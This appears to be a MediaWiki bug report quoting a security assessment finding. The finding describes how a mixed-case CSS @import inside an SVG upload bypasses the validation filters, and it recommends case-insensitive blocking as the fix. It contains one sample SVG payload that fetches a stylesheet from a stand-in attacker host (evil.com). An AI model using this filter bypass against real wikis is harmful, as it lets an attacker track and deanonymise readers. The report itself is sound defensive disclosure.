From the iSec assessment, iSEC-WMF1214-3.
They weren't able to get xss as a result, and we don't embed svg's in articles (yet), so it shouldn't be too exploitable, but since the fix is easy, we should get this patched soon.
DESCRIPTION: When uploading an SVG file, it is possible to bypass the validation filters and upload
an SVG file that references a remote CSS. For example, the following style declaration within an SVG
file will cause any browser that renders the file to fetch http://evil.com/attack.css :
<svg xmlns="http://www.w3.org/2000/svg"> <style>@imporT'http://evil.com/attack.css';</style> </svg>
This vulnerability can be exploited to break the anonymity of MediaWiki's readers. This can be used
by malicious individual or governments, which will be able to identify the reader's location from their
IP and the visited page from the referrer header.
SHORT TERM SOLUTION: Modify the regular expressions for validating SVG file uploads to block the
import keyword in a case-insensitive manner.
LONG TERM SOLUTION: Examine all other validation expressions to ensure that case-sensitivity is han-
dled in a context-appropriate manner.
Affected Versions: This resulted from an incomplete fix for T71008, which affected all versions of mediawiki that allowed SVG uploads